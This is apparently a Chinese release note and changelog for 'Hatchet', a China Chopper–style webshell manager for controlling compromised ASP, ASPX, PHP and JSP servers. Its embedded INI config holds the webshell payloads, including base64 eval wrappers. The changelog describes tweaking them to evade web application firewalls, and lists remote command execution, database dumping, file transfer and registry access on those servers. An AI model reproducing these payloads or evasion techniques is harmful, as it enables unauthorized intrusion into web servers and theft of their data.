Hatchet VS2005完整源码
-
说明: 我是一个产刀的,用于什么用途,由您自行选择。
-
致谢: 菜刀某前辈及各位网友的建议
-
弱点: 存在细节方面没处理好 数据库与菜刀有所区别不能共用
-
优点: 持续更新 快捷键操作 注册表读取 HTTP头自行控制 POST部分数据可自定义,突破安全狗等WAF(一句话需自行处理) PHP Warning 警告去除,避免某些WAF等记录 PHP支持多种执行命令,安全模式也能执行 PHP管理PostgreSQL、ODBC_MSSQL、PDO_MYSQL、PDO_MSSQL数据库 HTTP代理,只完成PHP。支持HTTP[S] GET POST 文件夹双击进入,树形框的上一层可以点击 支持NTLM验证 COMBO历史记录 支持选择数据库后直接执行SQL命令 数据库右键获取20条记录 支持JSP上传 文件[夹]剪切(文件移动机制秒移) 文件[夹]多选删除 文件[夹]多选下载 应该来说不会崩溃 右键导出数据库查询结果保存TXT,默认每一个字段用一个【TAB】分开,如果需要用其他字符请在填写保存文件名的时候,后面加上&&,紧跟分隔符。如: table.txt&&@@ 数据库执行SQL查询时,直接导出到本地文件,不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt 支持PHP脚本的数据库管理,远程备份。如: Select * From Members Limit 0,20--save:data.sql--split:@@
-
后门: 缩小体积已加UPX壳 绝无有意添加的后门,但三流的业余技能不排除被远程溢出的BUG 文件: C:\Projects\Hatchet\release\Hatchet.exe 大小: 269312 字节 文件版本: 1.0.0.1 修改时间: 2014年8月26日, 12:19:43 MD5: 91FAA43F3F89083F2E9C78D05E13673C SHA1: A1B598CB4EB47554E6F191A7EB33111F462C77FD CRC32: C094BD42
/*
[Header]
User-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Referer=1
X-Forwarded-For=1
[/Header]
[Headers]
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
[/Headers]
[POST]
ASP_POST_DATA==Execute("Execute(""On+Error+Resume+Next:Response.Clear:
ASPX_POST_DATA==Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(%nPageCode%).GetString(System.Convert.FromBase64String("%szBase64EvalCode%")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();
PHP_POST_DATA==@eval(base64_decode($_POST[z0]));&z0=
PHP_POST_Z0_DATA=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);
[/POST]
##################################################
#以下是说明
请严格保持该格式,大小写不一样
Referer 为1 则程序自动添加
X-Forwarded-For 为1 则程序自动随机生成添加
如果要自己手动添加其固定值,请设为0,后在[Headers]里添加即可。
[POST]里为POST的部分数据,可自行变异这段代码,过安全狗等,很灵活的哦~
%nPageCode% 为程序需要处理的编码,请保留
%szBase64EvalCode% 为程序需要处理的执行代码,请保留
*/2013.12.03
- 本地数据库单引号
- CMD选择所有,任意键覆盖
- FileSave CTRL+A
2013.12.07
- JSP 传递没有 UrlEnCode
- 增加文件夹下载
- 站点管理,光标URL全选
- szMyBase64Encode.Replace("+","%2B");
2013.12.09
- 增加 HTTP 错误显示
- 修正下载目录,win linux / \
- 修正'\0'格式化发生的截断
2013.12.10
- TAB标签OK
- ASPX脚本编码
2013.12.11
- TAB的X范围加大
- PHP脚本过安全狗
2013.12.12
- eval preg_replace均可以使用过狗版本 chr(45).
- 稍微完善一下状态栏
2013.12.13
- 下载、上传文件开启一个新线程
2013.12.18
- asp \r\nOn+Error 过狗
- aspx var err\r\n 过狗
- Shell类型编辑时,内容一样不更新
- 文件管理重命名、更改时间,内容一样不更新
- 快捷键 F2 文件管理重命名
2013.12.19
- 增加自写代码
- 增加HTTP头 INI里配置(在主界面右键里,如果文件不存在,第一次自动生成)
2013.12.21
- 修正文件内容Linux(\n)换行显示
- 文件内容 Ctrl+F 查找
- 修正多线程,随机IP都一样
- PHP Warning 警告去除
- 自写代码快捷键 Ctrl+A,F5执行
2013.12.23
- 增加右键数据库查询结果导出TXT,默认每一个字段用一个【TAB】分开,如果需要用其他字符请在填写保存文件名的时候,后面加上&&,紧跟分隔符。如: table.txt&&,
- 增加数据库执行SQL查询时,直接导出到本地文件,不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt
- 数据库查询结果显示,计算错误的小Bug
- 数据库错误显示的问题
2013.12.24
- UTF8 GBK互换的BUG
2013.12.27
- 增加连接数据库代码实例
- 增加命令执行方式(system,passthru,shell_exec,exec,WScript.shell)
2013.12.29
- 增加PHP管理PostgreSQL数据库
- PHP MySQL少写z1=
2014.01.04
- 增加PHP管理ODBC_MSSQL数据库
2014.01.07
- 数据库导出HTML编码设置charset=GBK
- JSP查询数据库错误不弹AfxMessageBox
2014.01.08
- Shell列表排序
- Shell日期的月份日期添加前导零
- 修正上传文件大小限制
2014.01.09
- 修正CMD,cls清空后上下箭头还原旧内容
2014.01.10
- 显示下载进度大小
- 选择保存文件夹可删除|OFN_NOCHANGEDIR
- 文件下载完成,自动打开文件夹选定文件。
2014.01.14 感谢luoye
- 文件管理路径处理问题。防止调皮的伙伴C:\\\\\\或C://////////或C:
- JSP db2连接例子有误password=123456;后面有分号。
2014.01.24
- 增加标题栏右键系统菜单
- 记忆选择标签,文件管理,文件内容管理,内容关闭,回到文件管理
- 路途再远,也要回家。小伙伴们春节快乐!!!
2014.02.11
- 运行软件,如果存在INI,自动加载。之前需要右键才会加载。OnMainUpdateIni(bool bNoCreat=true);
- 过360网站卫士
- POST前一小段数据可在INI里自定义,经研究可突破安全狗等WAF。 "=Execute("Execute(""On+Error+Resume+Next: ==> Ini_szASP_POST_DATA + " "=%40eval%09%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0= ==> Ini_szPHP_POST_DATA + "
2014.02.21
- 数据库和文件管理树形框就地编辑,只是方便复制内容,不会改变服务器。
- 修正获取列表框的小问题。GetNextItem < 0 return;
- 增加文件复制,文件剪切(仅PHP)
2014.02.22
- 增加文件剪切(ASP ASPX JSP)
2014.03.05
- 修正PreTranslateMessage事件处理忘记及时返回
- 修正文件管理,后续增加的映射磁盘网络磁盘等,显示会有问题。
2014.03.17
- 某种原因,更改软件名称: Hatchet
- 增加POST的z0前部分自定义,突破安全宝的Base64关键词。
- 修正CMD框,等宽字体,对齐的问题。
2014.03.18
- 修正CMD返回路径的截取问题
- 修正代码执行,等宽字体,对齐的问题。
- 修正获取文件内容,等宽字体,对齐的问题。
- 增加部分多线程,不卡界面。
- 增加代码执行导出导入。
2014.04.01
- 界面大改动(非常感谢p1n9y_fly)
- 增加大部分多线程
- 增加部分快捷键
2014.04.02
- 再次修正随机IP都一样
- 取消自动添加Cookie,导致INI里填的Cookie不能被添加上 INTERNET_FLAG_NO_COOKIES
- 增加快捷键 Ctrl+V
- 增加系统托盘
- 文件内容保存线程变量未初始化(感谢Xi总)
- 修正重命名、新建目录,如果文件[夹]存在,覆盖。(感谢Xi总)
2014.04.04
- 增加上传文件后自动刷新列表
- 修正PHP文件[夹]可读可写标注。换成is_readable is_writable(感谢敌敌喂)
- 修正树形框,判断给定树项是否包含子项,2014.04.04 BUG,有子项,不一定已经存在(感谢敌敌喂)
- 修正文件管理C:////这种路径
- 修正CMD Ctrl+V
- 增加Shell列表快捷键 Insert(添加) Delete(删除) Enter(编辑)
- 增加文件管理列表快捷键,回车进入文件夹或者文件内容编辑。
2014.04.07
- 增强多文件处理
- 修正文件管理树形框小问题
- 更换文件管理EDIT->COMBO
- 增加注册表管理
2014.04.14
- 增加注册表本地缓存
- 稍微完善一下状态栏
- 修正asp数据库截取的BUG(感谢Ciph2r)
- 修正编辑的对话框显示位置问题
- 增加COMBO记录
2014.05.07
- 增加显示版本
- 修正CMD cls保留系统信息
- 增加CMD Please wait...
- 增加数据库右键查询20条
- 增加数据库ESC取消编辑
- 修正文件图标szIcoTemp变量忘记初始化
- 文件管理,回车或双击的文件如果是以下弹出下载 .jpg.gif.png.bmp.jpeg.ico .zip.rar.tgz.7z.tar.gz.iso.cab.bz2.jar.dmg .exe.msi.dll.sys.avi.mpeg.mpg.vob.rmvb.wmv.mp3.mp4.3gp.ogg.voc .swf.pdf.flv.fla.psd.doc.docx.xls.xlsx.ppt.pptx.mdb.rtf
2014.05.09
- 主页增加复制URL地址(Ctrl+C)
- 文件夹双击进入,树形框跟进(感谢Lee Swagger)
- 文件夹双击进入,树形框选择项并没有改变。SelectItem执行失败,换OnNMClickTree判断
- 增加ASPX POST数据INI自定义
- MYSQL如有不正常的表名,中文、空格等,请用`包含表名(感谢Hancock)
2014.05.21
- 增加全部EDIT,CTRL+A
- 修正MAIN IDC_EDIT_FIND,大小改变,被覆盖隐藏
- 增加Wget线程
- 修正数据库显示结果,编码问题导致的死循环
- 修正asp特殊环境缓存的问题。Response.Clear
- 修正asp数据库SI变量初始化
- 优化数据库返回的列表宽度
2014.06.06
- 增加浏览器功能,以便支持NTLM验证(感谢R)
- 修正CMD如果所在光标位置可更改粘贴(感谢R)
- 增加CMD,ESC按键,清除当前输入的命令
- 增加浏览器状态和加载完成后的地址显示
2014.07.02
- 修正如果标签已关闭,线程还在运行。导致的程序崩溃。if (pDlg->m_hWnd == NULL)
- 增加PDO管理mysql和mssql数据库
2014.07.07
- 修正PHP执行cmd变量未初始化$ret=1(函数禁用导致的出错)
- 修正CMD显示的小问题
- 切换标签,当前Dialog获得焦点
- 支持PHP脚本的数据库管理,远程备份
2014.08.26
- 文件上传分块缩小,51200
- 添加一些状态
- Data select show
- CMD命令排序
- Data Ctrl+C和F2快捷键
- 修正ComboBox下拉高度
- 添加Shell判断是否存在